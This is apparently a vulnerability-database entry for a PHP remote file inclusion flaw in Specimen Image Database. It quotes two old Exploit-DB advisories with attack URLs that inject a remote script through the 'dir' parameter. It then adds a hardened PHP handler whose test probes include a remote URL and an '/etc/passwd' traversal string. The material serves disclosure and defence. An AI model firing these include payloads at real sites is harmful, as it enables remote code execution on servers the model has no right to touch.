CVE-2008-7152
Published: 2009-09-01
Priority: P3
CVSS 2.0: 6.8 (medium), vector AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public (Exploit-DB entries below)
EPSS: 1.92% (77.4th percentile)
Multiple PHP remote file inclusion vulnerabilities in Specimen Image Database (SID), when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the dir parameter to (1) client.php or (2) taxonservice.php.
No detection rules found.
Exploit-DB: Specimen Image Database - 'taxonservice.php?dir' Remote File Inclusion (2008-03-07)
---
source: https://www.securityfocus.com/bid/28142/info
SID (Specimen Image Database) is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/SID_box_notns_path/taxonservice.php?dir=shell.txt?
Exploit-DB: Specimen Image Database - 'client.php' Remote File Inclusion (2006-10-16)
---
SID - [dir] Remote File Include Vulnerability
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : SID
URL : http://sid.zoology.gla.ac.uk/SID_box_notns.zip
Exploit:
~~~~~~~
Variable $dir is not sanitized. When register_globals=on, an attacker can exploit this vulnerability with a simple PHP injection script.
# http://www.site.com/[path]/client.php?dir=[Evil_Script]
Shoutz:
~~~~~~
# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net
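The description above and the advisory's note about $dir both describe the same root cause: a path is taken from a request variable that register_globals populates without any assignment in the script, and it reaches include(). The following is an added example, not code from the SID project, showing the vulnerable pattern beside a hardened handler. The directory layout (`pages/<name>/taxon.php`), the allowlist names and the function names are assumptions for illustration.

```php
<?php
// Added example, not code from the SID project. Illustrates the class of bug
// described for CVE-2008-7152: a file-system path taken from an unvalidated
// request variable is passed to include(), and with register_globals=on the
// variable is populated directly from the query string.

declare(strict_types=1);

// --- Vulnerable pattern (shown for comparison only; never executed here) ---
// With register_globals=on, $dir is filled from ?dir=... although the script
// never assigns it, and include() will fetch a URL when allow_url_include is
// on. Kept as a string so this file cannot run it.
const VULNERABLE_PATTERN = 'include($dir . "/taxon.php");';

// Base directory under which includable pages live (assumed layout).
const SID_INCLUDE_BASE = __DIR__ . '/pages';

// Allowlist of logical page names the application uses (hypothetical names).
const SID_ALLOWED_DIRS = ['box', 'taxon', 'client'];

/**
 * Resolve a user-supplied "dir" value to a safe absolute path, or null.
 * Defence in depth: allowlist the logical name first, then verify that the
 * resolved path still lies inside SID_INCLUDE_BASE.
 */
function sid_resolve_include(string $requested): ?string
{
    // 1. Only known logical names pass; this alone blocks URLs and "..".
    if (!in_array($requested, SID_ALLOWED_DIRS, true)) {
        return null;
    }
    // 2. Containment check: realpath() collapses symlinks and ".." so the
    //    prefix comparison is meaningful.
    $base = realpath(SID_INCLUDE_BASE);
    $candidate = realpath(SID_INCLUDE_BASE . '/' . $requested . '/taxon.php');
    if ($base === false || $candidate === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Hardened entry point: read the parameter explicitly instead of relying on
// register_globals (which should be Off in php.ini regardless), and include
// only what sid_resolve_include() returns.
function sid_render(array $query): string
{
    $dir = isset($query['dir']) && is_string($query['dir']) ? $query['dir'] : '';
    $path = sid_resolve_include($dir);
    if ($path === null) {
        http_response_code(400);
        return 'rejected: ' . var_export($dir, true);
    }
    ob_start();
    include $path;
    return (string) ob_get_clean();
}

// Constructed inputs for a local run (php this_file.php). Only the
// allowlisted name can ever reach include(); the others are rejected before
// any file-system or network access happens.
if (PHP_SAPI === 'cli') {
    @mkdir(SID_INCLUDE_BASE . '/taxon', 0755, true);
    file_put_contents(SID_INCLUDE_BASE . '/taxon/taxon.php', "<?php echo 'taxon page ok';");
    $probes = ['taxon', 'http://remote-host.invalid/x.txt?', '../../etc/passwd', ''];
    foreach ($probes as $probe) {
        echo sid_render(['dir' => $probe]), "\n";
    }
}
```

The allowlist is the control that actually closes the hole; the realpath() containment check is there so that a future change to the allowlist (for example, accepting a sub-path) cannot silently reintroduce traversal. Both are independent of register_globals, which makes the handler safe even on a host where that setting is still on.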
No writeups or analysis indexed.